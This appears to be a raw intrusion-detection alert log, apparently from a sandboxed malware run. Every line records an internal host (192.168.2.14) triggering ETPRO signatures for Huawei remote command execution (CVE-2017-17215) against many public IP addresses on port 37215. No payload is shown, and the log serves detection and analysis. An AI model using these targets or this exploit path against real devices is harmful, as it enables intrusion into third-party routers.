                                                        06/13/24-21:32:58.823027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4084237215192.168.2.14156.21.210.2
                                                        06/13/24-21:32:23.929671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011037215192.168.2.14156.176.169.168
                                                        06/13/24-21:32:23.941743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862437215192.168.2.1441.208.9.52
                                                        06/13/24-21:32:42.404333TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3962437215192.168.2.1441.228.165.26
                                                        06/13/24-21:32:34.192419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344437215192.168.2.14156.243.220.111
                                                        06/13/24-21:32:01.241970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013437215192.168.2.1441.135.22.141
                                                        06/13/24-21:33:11.174100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087437215192.168.2.14156.104.220.99
                                                        06/13/24-21:32:48.551957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997637215192.168.2.1441.9.158.203
                                                        06/13/24-21:32:11.505623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5107637215192.168.2.14197.192.13.207
                                                        06/13/24-21:32:56.758027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204037215192.168.2.14156.221.226.6
                                                        06/13/24-21:32:15.606570TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4687837215192.168.2.14197.44.135.203
                                                        06/13/24-21:32:56.757183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6078637215192.168.2.14156.100.224.120
                                                        06/13/24-21:33:02.912723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598837215192.168.2.14156.224.129.233
                                                        06/13/24-21:32:46.503724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642237215192.168.2.14156.168.7.69
                                                        06/13/24-21:32:50.629157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612237215192.168.2.14197.73.121.233
                                                        06/13/24-21:32:28.048098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893637215192.168.2.14197.236.35.26
                                                        06/13/24-21:31:57.132255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256037215192.168.2.14197.196.65.70
                                                        06/13/24-21:33:07.038293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3931837215192.168.2.14197.156.109.239
                                                        06/13/24-21:33:13.210838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286637215192.168.2.14156.115.99.201
                                                        06/13/24-21:32:13.544695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4884237215192.168.2.14156.183.179.234
                                                        06/13/24-21:32:42.405873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427837215192.168.2.14197.196.159.134
                                                        06/13/24-21:32:07.417954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118637215192.168.2.1441.24.15.110
                                                        06/13/24-21:32:15.607006TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565637215192.168.2.14197.153.254.140
                                                        06/13/24-21:31:59.175617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054637215192.168.2.14156.116.142.15
                                                        06/13/24-21:32:28.045370TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4009037215192.168.2.1441.92.1.60
                                                        06/13/24-21:32:52.657484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5899437215192.168.2.1441.35.238.17
                                                        06/13/24-21:33:05.011740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983637215192.168.2.14197.143.130.99
                                                        06/13/24-21:32:13.543590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844837215192.168.2.14156.202.100.72
                                                        06/13/24-21:32:09.455850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4619837215192.168.2.1441.236.179.83
                                                        06/13/24-21:32:30.128204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5346237215192.168.2.14197.10.215.56
                                                        06/13/24-21:31:57.131827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565837215192.168.2.14156.163.7.110
                                                        06/13/24-21:32:21.787046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6007637215192.168.2.14156.70.145.46
                                                        06/13/24-21:31:57.154266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074437215192.168.2.14156.61.117.129
                                                        06/13/24-21:32:38.323258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4160237215192.168.2.14156.131.94.111
                                                        06/13/24-21:32:54.725897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657237215192.168.2.14197.38.179.249
                                                        06/13/24-21:32:40.354241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4640037215192.168.2.1441.220.176.2
                                                        06/13/24-21:31:59.175668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4632637215192.168.2.14156.230.224.2
                                                        06/13/24-21:32:42.404658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5344637215192.168.2.14156.255.68.105
                                                        06/13/24-21:32:01.240921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505437215192.168.2.14197.68.134.58
                                                        06/13/24-21:32:52.677124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380237215192.168.2.14197.32.236.117
                                                        06/13/24-21:32:19.729888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353037215192.168.2.14197.172.15.168
                                                        06/13/24-21:32:56.758392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493237215192.168.2.1441.38.118.49
                                                        06/13/24-21:32:32.168916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519837215192.168.2.14197.187.43.236
                                                        06/13/24-21:32:17.670576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970437215192.168.2.1441.133.172.209
                                                        06/13/24-21:32:52.655744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530837215192.168.2.14156.35.28.186
                                                        06/13/24-21:32:50.631791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236437215192.168.2.1441.176.98.0
                                                        06/13/24-21:33:02.935597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4714437215192.168.2.14156.114.72.14
                                                        06/13/24-21:32:30.122968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180837215192.168.2.14156.221.171.199
                                                        06/13/24-21:32:03.308617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922237215192.168.2.14197.99.59.44
                                                        06/13/24-21:33:09.112269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3830837215192.168.2.14197.175.160.246
                                                        06/13/24-21:32:56.788477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789637215192.168.2.1441.33.145.55
                                                        06/13/24-21:31:59.197825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760637215192.168.2.1441.231.104.194
                                                        06/13/24-21:33:02.910280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536437215192.168.2.14156.119.253.166
                                                        06/13/24-21:32:44.457860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14197.20.221.217
                                                        06/13/24-21:33:04.993753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804037215192.168.2.1441.136.121.9
                                                        06/13/24-21:32:03.294576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512437215192.168.2.14156.202.193.218
                                                        06/13/24-21:32:30.099410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4382637215192.168.2.14197.83.2.236
                                                        06/13/24-21:32:44.454229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794037215192.168.2.14197.193.255.226
                                                        06/13/24-21:32:34.192385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383437215192.168.2.14197.229.118.108
                                                        06/13/24-21:32:48.573129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782037215192.168.2.1441.197.57.83
                                                        06/13/24-21:32:09.458567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426437215192.168.2.14197.168.18.174
                                                        06/13/24-21:32:21.785814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540037215192.168.2.1441.151.85.113
                                                        06/13/24-21:32:21.804536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603037215192.168.2.1441.92.219.172
                                                        06/13/24-21:33:07.039213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721037215192.168.2.14197.226.63.136
                                                        06/13/24-21:32:09.440831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939837215192.168.2.14156.78.161.22
                                                        06/13/24-21:33:04.990200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329437215192.168.2.14197.159.99.190
                                                        06/13/24-21:32:03.276594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4654837215192.168.2.1441.30.149.64
                                                        06/13/24-21:32:56.758606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6021837215192.168.2.14197.9.88.245
                                                        06/13/24-21:32:15.636249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798637215192.168.2.14197.54.47.148
                                                        06/13/24-21:32:36.248341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4050037215192.168.2.14197.130.223.204
                                                        06/13/24-21:32:44.457060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5914037215192.168.2.14156.49.245.104
                                                        06/13/24-21:33:15.275008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.14197.112.4.153
                                                        06/13/24-21:32:19.728528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510437215192.168.2.14197.95.141.212
                                                        06/13/24-21:32:42.419414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030637215192.168.2.14156.195.208.173
                                                        06/13/24-21:32:34.213732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455837215192.168.2.14156.205.232.147
                                                        06/13/24-21:32:50.611551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333837215192.168.2.14197.252.121.147
                                                        06/13/24-21:33:09.087876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825637215192.168.2.14156.206.79.6
                                                        06/13/24-21:33:13.212628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101837215192.168.2.1441.55.74.105
                                                        06/13/24-21:32:50.630311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288837215192.168.2.1441.28.51.229
                                                        06/13/24-21:33:02.911311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658037215192.168.2.14197.164.98.238
                                                        06/13/24-21:33:07.038244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5661037215192.168.2.14197.123.78.120
                                                        06/13/24-21:32:25.970341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044037215192.168.2.14197.191.244.142
                                                        06/13/24-21:32:44.476159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5692837215192.168.2.14197.225.208.122
                                                        06/13/24-21:32:40.358605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370637215192.168.2.14197.99.206.127
                                                        06/13/24-21:32:50.632218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367037215192.168.2.14156.245.45.251
                                                        06/13/24-21:33:00.872125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560237215192.168.2.1441.57.211.59
                                                        06/13/24-21:33:02.949872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.14197.198.108.198
                                                        06/13/24-21:32:42.404898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4132837215192.168.2.1441.115.46.23
                                                        06/13/24-21:32:09.436561TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025637215192.168.2.14156.213.156.86
                                                        06/13/24-21:33:09.088821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411037215192.168.2.14197.180.156.179
                                                        06/13/24-21:32:30.126898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272237215192.168.2.1441.230.114.11
                                                        06/13/24-21:32:21.804004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100837215192.168.2.1441.175.158.224
                                                        06/13/24-21:32:23.834362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985837215192.168.2.14156.154.21.120
                                                        06/13/24-21:32:46.527511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4349037215192.168.2.1441.185.25.152
                                                        06/13/24-21:31:59.176655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5323437215192.168.2.1441.117.38.53
                                                        06/13/24-21:32:01.238345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389437215192.168.2.1441.7.253.170
                                                        06/13/24-21:32:30.100712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430437215192.168.2.14197.44.200.108
                                                        06/13/24-21:31:57.135586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4093637215192.168.2.14197.136.192.34
                                                        06/13/24-21:32:21.801288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.1441.89.115.71
                                                        06/13/24-21:32:32.168435TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013837215192.168.2.1441.161.57.174
                                                        06/13/24-21:33:11.160955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5560837215192.168.2.14197.234.66.16
                                                        06/13/24-21:32:30.076141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884237215192.168.2.1441.79.23.27
                                                        06/13/24-21:33:00.867376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652837215192.168.2.14156.245.228.153
                                                        06/13/24-21:32:54.725665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311837215192.168.2.14197.12.127.125
                                                        06/13/24-21:33:02.936209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3449637215192.168.2.1441.148.103.117
                                                        06/13/24-21:32:17.672846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904237215192.168.2.14156.186.12.139
                                                        06/13/24-21:32:07.415783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118037215192.168.2.14156.183.176.1
                                                        06/13/24-21:31:59.199967TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854237215192.168.2.1441.160.6.160
                                                        06/13/24-21:32:09.438917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702237215192.168.2.1441.66.232.151
                                                        06/13/24-21:33:00.870365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281437215192.168.2.14197.114.205.6
                                                        06/13/24-21:33:15.258197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308637215192.168.2.14156.57.205.118
                                                        06/13/24-21:32:11.488607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911037215192.168.2.14197.214.37.105
                                                        06/13/24-21:32:30.101027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582637215192.168.2.1441.78.71.241
                                                        06/13/24-21:32:01.238402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970837215192.168.2.14156.8.7.247
                                                        06/13/24-21:32:50.630504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5772237215192.168.2.14197.196.73.146
                                                        06/13/24-21:33:04.988528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14156.28.46.81
                                                        06/13/24-21:32:21.787823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140037215192.168.2.1441.97.48.213
                                                        06/13/24-21:32:36.266820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274237215192.168.2.1441.246.150.128
                                                        06/13/24-21:32:42.409318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313037215192.168.2.14197.129.159.16
                                                        06/13/24-21:32:21.786152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690437215192.168.2.14156.156.132.43
                                                        06/13/24-21:32:40.356253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3999637215192.168.2.1441.210.125.1
                                                        06/13/24-21:32:01.222534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4222637215192.168.2.1441.36.193.183
                                                        06/13/24-21:32:15.630340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784637215192.168.2.14156.218.17.184
                                                        06/13/24-21:32:58.841982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5701637215192.168.2.14197.186.15.20
                                                        06/13/24-21:32:44.477000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834437215192.168.2.1441.106.160.150
                                                        06/13/24-21:33:09.102596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041637215192.168.2.14197.237.39.120
                                                        06/13/24-21:32:09.440872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639437215192.168.2.1441.83.90.183
                                                        06/13/24-21:32:46.508109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330037215192.168.2.1441.239.208.246
                                                        06/13/24-21:33:07.057850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474437215192.168.2.14197.213.152.247
                                                        06/13/24-21:32:05.377030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945037215192.168.2.1441.98.125.28
                                                        06/13/24-21:32:11.505485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994837215192.168.2.1441.247.121.200
                                                        06/13/24-21:32:13.546007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392837215192.168.2.14156.227.84.10
                                                        06/13/24-21:33:13.229487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4295037215192.168.2.14156.114.210.246
                                                        06/13/24-21:32:01.221500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036637215192.168.2.14156.98.177.189
                                                        06/13/24-21:32:32.154819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5256837215192.168.2.14197.29.125.99
                                                        06/13/24-21:31:57.091307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193637215192.168.2.14156.77.138.79
                                                        06/13/24-21:32:23.943518TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5965437215192.168.2.14197.127.214.189
                                                        06/13/24-21:32:19.731338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026037215192.168.2.14197.75.84.113
                                                        06/13/24-21:32:21.799895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031637215192.168.2.14156.108.33.118
                                                        06/13/24-21:33:11.156528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275237215192.168.2.1441.220.81.128
                                                        06/13/24-21:32:17.674800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5668837215192.168.2.14156.65.38.109
                                                        06/13/24-21:32:21.781277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6023637215192.168.2.14197.131.116.6
                                                        06/13/24-21:32:32.169272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703637215192.168.2.14156.19.49.45
                                                        06/13/24-21:32:11.488456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5885237215192.168.2.14197.49.237.247
                                                        06/13/24-21:32:30.126395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998637215192.168.2.14156.178.121.155
                                                        06/13/24-21:32:30.076570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838237215192.168.2.14156.96.245.240
                                                        06/13/24-21:32:05.347840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050837215192.168.2.1441.234.198.2
                                                        06/13/24-21:32:13.543070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123037215192.168.2.14156.15.107.156
                                                        06/13/24-21:32:40.358268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277037215192.168.2.14197.67.244.85
                                                        06/13/24-21:32:21.786579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228837215192.168.2.1441.235.18.67
                                                        06/13/24-21:32:40.353473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5526637215192.168.2.1441.59.249.77
                                                        06/13/24-21:32:42.404290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982837215192.168.2.1441.111.48.194
                                                        06/13/24-21:33:07.039445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016237215192.168.2.14197.220.230.208
                                                        06/13/24-21:32:34.193876TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183437215192.168.2.14197.91.185.227
                                                        06/13/24-21:33:17.309214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341637215192.168.2.1441.209.159.193
                                                        06/13/24-21:32:30.124559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663637215192.168.2.1441.150.155.114
                                                        06/13/24-21:32:13.543929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680237215192.168.2.14197.28.128.43
                                                        06/13/24-21:33:04.991182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5645837215192.168.2.14197.111.217.62
                                                        06/13/24-21:33:17.308257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565637215192.168.2.1441.188.119.90
                                                        06/13/24-21:32:01.225072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756637215192.168.2.14156.136.120.179
                                                        06/13/24-21:33:15.257463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5254437215192.168.2.14156.24.127.164
                                                        06/13/24-21:32:03.277676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4114037215192.168.2.14156.13.239.178
                                                        06/13/24-21:32:38.316349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395237215192.168.2.1441.141.176.10
                                                        06/13/24-21:32:11.507465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628237215192.168.2.14197.198.74.142
                                                        06/13/24-21:32:36.248007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5311237215192.168.2.14156.72.177.94
                                                        06/13/24-21:33:13.211197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679237215192.168.2.1441.114.221.235
                                                        06/13/24-21:32:23.834638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905237215192.168.2.14156.158.84.97
                                                        06/13/24-21:32:28.045743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291837215192.168.2.14197.181.39.34
                                                        06/13/24-21:33:00.885392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5499037215192.168.2.1441.147.249.8
                                                        06/13/24-21:32:21.804700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946437215192.168.2.14156.57.248.207
                                                        06/13/24-21:32:30.076874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4783237215192.168.2.14197.191.131.120
                                                        06/13/24-21:32:56.787853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3815437215192.168.2.14156.254.21.78
                                                        06/13/24-21:32:09.457534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861837215192.168.2.14197.149.73.94
                                                        06/13/24-21:32:13.567744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5796637215192.168.2.14156.250.1.218
                                                        06/13/24-21:32:21.786853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542837215192.168.2.14197.39.205.224
                                                        06/13/24-21:32:23.940834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3831037215192.168.2.14156.244.37.232
                                                        06/13/24-21:32:01.221283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446037215192.168.2.14197.136.231.200
                                                        06/13/24-21:33:02.909492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140237215192.168.2.1441.134.6.75
                                                        06/13/24-21:32:25.993129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606037215192.168.2.14156.121.152.34
                                                        06/13/24-21:32:40.374225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566637215192.168.2.14197.248.20.168
                                                        06/13/24-21:32:15.607713TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682837215192.168.2.14156.137.222.149
                                                        06/13/24-21:32:48.573634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4638837215192.168.2.1441.254.158.230
                                                        06/13/24-21:32:07.404318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5920637215192.168.2.1441.9.183.41
                                                        06/13/24-21:32:09.440800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4297437215192.168.2.14197.22.160.48
                                                        06/13/24-21:33:09.106123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4104437215192.168.2.14156.77.32.12
                                                        06/13/24-21:31:57.137957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4506837215192.168.2.14197.14.31.12
